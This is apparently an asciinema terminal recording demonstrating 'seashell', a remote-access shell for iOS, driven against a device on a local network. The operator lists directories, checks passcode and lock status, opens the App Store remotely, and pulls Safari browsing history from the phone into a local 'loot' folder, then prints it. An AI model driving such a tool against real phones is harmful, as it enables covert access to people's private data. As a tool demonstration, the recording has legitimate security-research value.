{"version": 2, "width": 90, "height": 30, "timestamp": 1703630710, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-256color"}}
[1, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m: \u001b[34m192.168.2.108\u001b[0m)> "]
[1.1857119999999988, "o", "l"]
[1.393139999999999, "o", "i"]
[1.8663950000000007, "o", "s"]
[1.9724819999999994, "o", "t"]
[2.4070789999999995, "o", "\r\n"]
[2.465952999999999, "o", "\u001b[1K\r\r\nListing: .:\r\n\u001b[1K\r\r\n\u001b[1K\r    Mode         Size        Type         Modified               Name\r\n\u001b[1K\r    ----         ----        ----         --------               ----\r\n"]
[2.4662749999999996, "o", "\u001b[1K\r    ---------    0.00 B      file         2023-02-09 09:08:48    .file\r\n\u001b[1K\r    r-xr-xr-x    1.36 KB     directory    2023-12-26 16:21:47    dev\r\n\u001b[1K\r    rwx------    64.00 B     directory    2023-02-09 09:08:48    .ba\r\n\u001b[1K\r    rwx------    64.00 B     directory    2023-02-09 09:08:48    .mb\r\n\u001b[1K\r    rwxr-xr-x    1.15 KB     directory    2023-07-09 11:39:42    var\r\n\u001b[1K\r    rwxr-xr-x    128.00 B    directory    2023-02-09 09:08:48    bin\r\n\u001b[1K\r    rwxr-xr-x    224.00 B    directory    2023-02-09 09:08:48    System\r\n\u001b[1K\r    rwxr-xr-x    224.00 B    directory    2023-02-09 09:08:48    private\r\n\u001b[1K\r    rwxr-xr-x    256.00 B    directory    2023-02-09 09:08:48    usr\r\n\u001b[1K\r    rwxr-xr-x    512.00 B    directory    2023-02-09 09:08:48    etc\r\n\u001b[1K\r    rwxr-xr-x    608.00 B    directory    2023-02-09 09:08:48    sbin\r\n\u001b[1K\r    rwxr-xr-x    640.00 B    directory    2023-02-09 09:08:48    Library\r\n\u001b[1K\r    rwxrwxr-x    4.61 KB     directory    2023-02-09 09:08:48    Applications\r\n"]
[2.466411000000001, "o", "\u001b[1K\r    rwxrwxr-x    64.00 B     directory    2023-02-09 09:08:48    Developer\r\n\u001b[1K\r    rwxrwxr-x    64.00 B     directory    2023-02-09 09:08:48    cores\r\n"]
[2.466443999999999, "o", "\u001b[1K\r    rwxrwxrwx    4.80 KB     directory    2023-12-21 02:24:41    tmp\r\n\u001b[1K\r\r\n"]
[2.4665649999999992, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m: \u001b[34m192.168.2.108\u001b[0m)> "]
[3.575085999999999, "o", "p"]
[3.759564000000001, "o", "w"]
[4.041868000000001, "o", "d"]
[4.214119, "o", "\r\n"]
[4.2934470000000005, "o", "\u001b[1K\r* Working directory: /\r\n"]
[4.2935680000000005, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m: \u001b[34m192.168.2.108\u001b[0m)> "]
[4.881817000000002, "o", "c"]
[5.049130000000002, "o", "d"]
[5.144632000000001, "o", " "]
[6.528106000000001, "o", "/"]
[6.891933999999999, "o", "v"]
[6.974914999999999, "o", "e"]
[7.124275999999998, "o", "r"]
[7.2608229999999985, "o", "/"]
[7.770128, "o", "\b\u001b[K"]
[7.898864, "o", "\b\u001b[K"]
[8.013041000000001, "o", "\b\u001b[K"]
[8.206420999999999, "o", "a"]
[8.445208000000001, "o", "r"]
[8.524707, "o", "/"]
[8.789387999999999, "o", "m"]
[8.991389999999999, "o", "o"]
[9.137988, "o", "b"]
[9.254176000000001, "o", "i"]
[9.47129, "o", "l"]
[9.611153000000002, "o", "e"]
[10.078557, "o", "\r\n"]
[10.130490000000002, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m: \u001b[34m192.168.2.108\u001b[0m)> "]
[10.875274000000001, "o", "l"]
[11.086446000000002, "o", "i"]
[11.232205, "o", "s"]
[11.337178999999999, "o", "t"]
[11.757224999999998, "o", "\r\n"]
[11.877222000000003, "o", "\u001b[1K\r\r\nListing: .:\r\n\u001b[1K\r\r\n\u001b[1K\r    Mode         Size         Type         Modified               Name\r\n\u001b[1K\r    ----         ----         ----         --------               ----\r\n\u001b[1K\r    rw-r--r--    0.00 B       file         2023-12-11 17:52:30    terminal.sh\r\n\u001b[1K\r    rw-r--r--    25.00 B      file         2023-12-26 22:45:25    pwned\r\n\u001b[1K\r    rw-r--r--    4.10 KB      file         2023-07-09 11:40:22    AddressBook.sqlitedb\r\n"]
[11.877574000000003, "o", "\u001b[1K\r    rwx------    64.00 B      directory    2023-07-09 11:39:44    .ssh\r\n\u001b[1K\r    rwx------    96.00 B      directory    2023-07-09 11:41:24    Downloads\r\n\u001b[1K\r    rwx--x--x    4.86 KB      directory    2023-07-09 11:39:44    Library\r\n\u001b[1K\r    rwxr-x---    416.00 B     directory    2023-07-09 11:39:44    Media\r\n\u001b[1K\r    rwxr-xr-x    160.00 B     directory    2023-07-09 11:39:44    Containers\r\n\u001b[1K\r    rwxr-xr-x    176.62 KB    file         2023-12-26 21:56:07    Test.ipa\r\n\u001b[1K\r    rwxr-xr-x    224.00 B     directory    2023-07-09 11:41:34    Documents\r\n"]
[11.877707000000001, "o", "\u001b[1K\r    rwxr-xr-x    64.00 B      directory    2023-07-09 11:39:44    Applications\r\n\u001b[1K\r    rwxr-xr-x    96.00 B      directory    2023-07-09 11:40:13    MobileSoftwareUpdate\r\n\u001b[1K\r\r\n"]
[11.877856999999999, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m: \u001b[34m192.168.2.108\u001b[0m)> "]
[15.687531999999997, "o", "s"]
[15.775928999999998, "o", "b"]
[15.991824999999999, "o", "i"]
[16.167579000000003, "o", "n"]
[16.282282000000002, "o", "f"]
[16.381059999999998, "o", "o"]
[16.826822999999997, "o", "\r\n"]
[16.917583999999998, "o", "\u001b[1K\r* Locked:   no\r\n\u001b[1K\r* Passcode: no\r\n"]
[16.917884, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m: \u001b[34m192.168.2.108\u001b[0m)> "]
[18.131331000000003, "o", "s"]
[18.226242, "o", "y"]
[18.367334999999997, "o", "s"]
[18.459201, "o", "i"]
[18.631318999999998, "o", "n"]
[18.752412, "o", "f"]
[18.847156, "o", "o"]
[19.167702, "o", "\r\n"]
[19.244128000000003, "o", "\u001b[1K\r* Name:    iOS\r\n* Arch:    arm64\r\n* Version: 20D67\r\n* Vendor:  Apple\r\n* UUID:    7d8d2e8a-89d1-4624-b4be-1130da5931a5        \r\n"]
[19.244245999999997, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m: \u001b[34m192.168.2.108\u001b[0m)> "]
[20.261394000000003, "o", "o"]
[20.422392000000002, "o", "p"]
[20.549449000000003, "o", "e"]
[20.653399, "o", "n"]
[20.834580000000003, "o", " "]
[20.991459999999996, "o", "c"]
[21.075218, "o", "o"]
[21.275959, "o", "m"]
[21.505724999999998, "o", "."]
[21.666656000000003, "o", "a"]
[21.738137000000002, "o", "p"]
[21.850741, "o", "p"]
[21.999478000000003, "o", "l"]
[22.114269, "o", "e"]
[22.209161, "o", "."]
[22.73158, "o", "A"]
[23.134385, "o", "p"]
[23.293778000000003, "o", "p"]
[23.84888, "o", "S"]
[24.913249, "o", "t"]
[25.002355, "o", "o"]
[25.159588, "o", "r"]
[25.331705999999997, "o", "e"]
[25.608752000000003, "o", "\r\n"]
[25.609285, "o", "\u001b[1K\rUsage: open <option> <arguments>\r\n"]
[25.609451999999997, "o", "\u001b[1K\r\r\nOptions:\r\n\u001b[1K\r\r\n\u001b[1K\r    Option    Arguments      Description\r\n\u001b[1K\r    ------    ---------      -----------\r\n\u001b[1K\r    url       <url>          Open URL in default browser.\r\n\u001b[1K\r    app       <bundle_id>    Open app by bundle id.\r\n\u001b[1K\r\r\n"]
[25.609645, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m: \u001b[34m192.168.2.108\u001b[0m)> "]
[27.643648, "o", "o"]
[27.860909999999997, "o", "p"]
[27.986759999999997, "o", "e"]
[28.112639, "o", "m"]
[28.487475000000003, "o", " "]
[28.755785000000003, "o", "\b"]
[28.864593, "o", "\b\u001b[K"]
[29.112952, "o", "n"]
[29.323983, "o", " "]
[29.555894000000002, "o", "a"]
[29.611336, "o", "p"]
[29.723139000000003, "o", "p"]
[29.868630000000003, "o", " "]
[30.027543, "o", "c"]
[30.080072, "o", "o"]
[30.256732999999997, "o", "m"]
[30.474663, "o", "."]
[30.614573, "o", "a"]
[30.677577999999997, "o", "p"]
[30.793604000000002, "o", "p"]
[30.931992, "o", "l"]
[31.042506000000003, "o", "e"]
[31.130588000000003, "o", "."]
[31.616697000000002, "o", "A"]
[32.189846, "o", "p"]
[32.30069, "o", "p"]
[32.688024, "o", "S"]
[32.98183, "o", "t"]
[33.295809, "o", "o"]
[33.408582, "o", "r"]
[33.554664, "o", "e"]
[33.735878, "o", "\r\n"]
[34.962316, "o", "\u001b[1K\r\u001b[1m\u001b[31m[-]\u001b[0m Failed to open app!\r\n"]
[34.962611, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m: \u001b[34m192.168.2.108\u001b[0m)> "]
[41.254695, "o", "open app com.apple.AppStore"]
[41.523646, "o", "\r\n"]
[41.610461, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m: \u001b[34m192.168.2.108\u001b[0m)> "]
[46.568701000000004, "o", "c"]
[46.643339, "o", "l"]
[46.759759, "o", "e"]
[47.037527999999995, "o", "a"]
[47.342772, "o", "r"]
[47.843149999999994, "o", "\r\n"]
[47.843473, "o", "\u001b[1K\r\u001b[H\u001b[J"]
[47.843632, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m: \u001b[34m192.168.2.108\u001b[0m)> "]
[48.619282, "o", "s"]
[48.804756999999995, "o", "a"]
[48.961792, "o", "f"]
[49.091620000000006, "o", "a"]
[49.341089999999994, "o", "r"]
[49.42089, "o", "i"]
[49.877872999999994, "o", "_"]
[50.255922, "o", "h"]
[50.465379, "o", "i"]
[50.903645, "o", "s"]
[51.212642, "o", "t"]
[51.287054999999995, "o", "o"]
[51.391887, "o", "r"]
[51.557047, "o", "y"]
[52.109703999999994, "o", "\r\n"]
[52.421392, "o", "\u001b[1K\r\u001b[1m\u001b[34m[*]\u001b[0m Downloading /private/var/mobile/Library/Safari/History.db (98304 bytes)\r\n"]
[53.331258000000005, "o", "\u001b[1K\r\u001b[1m\u001b[32m[+]\u001b[0m File saved as /Users/felix/.seashell/loot/History.db!\r\n"]
[53.373850000000004, "o", "\u001b[1K\r\u001b[1m\u001b[34m[*]\u001b[0m Downloading /private/var/mobile/Library/Safari/History.db-wal (477952 bytes)\r\n"]
[54.482348, "o", "\u001b[1K\r\u001b[1m\u001b[32m[+]\u001b[0m File saved as /Users/felix/.seashell/loot/History.db-wal!\r\n"]
[54.490463000000005, "o", "\u001b[1K\r\u001b[1m\u001b[34m[*]\u001b[0m Parsing history database...\r\n"]
[54.494671, "o", "\u001b[1K\r\r\nHistory:\r\n\u001b[1K\r\r\n\u001b[1K\r    Date                   URL\r\n"]
[54.494870000000006, "o", "\u001b[1K\r    ----                   ---\r\n\u001b[1K\r    2023-12-25 23:35:30    https://www.google.ie/search?q=test&ie=UTF-8&oe=UTF-8&hl=en-ie&client=safari\r\n\u001b[1K\r    2023-12-25 23:35:31    https://www.google.ie/search?q=test&ie=UTF-8&oe=UTF-8&hl=en-ie&client=safari\r\n\u001b[1K\r    2023-12-26 17:46:18    https://www.test.de/\r\n\u001b[1K\r    2023-12-26 17:46:19    https://www.google.ie/search?q=test&ie=UTF-8&oe=UTF-8&hl=en-ie&client=safari\r\n\u001b[1K\r    2023-12-26 17:46:44    https://www.google.ie/search?q=test&ie=UTF-8&oe=UTF-8&hl=en-ie&client=safari#sbfbu=1&pi=test\r\n\u001b[1K\r\r\n"]
[54.495005000000006, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m: \u001b[34m192.168.2.108\u001b[0m)> "]
[61.220254999999995, "o", "e"]
[61.623763999999994, "o", "x"]
[61.816833, "o", "i"]
[62.010580000000004, "o", "t"]
[62.324473, "o", "\r\n"]
[62.359042, "o", "\u001b[1K\r"]
[62.359375, "o", "\u001b[1K\r(\u001b[4mseashell\u001b[0m)> "]
[62.919214, "o", ""]
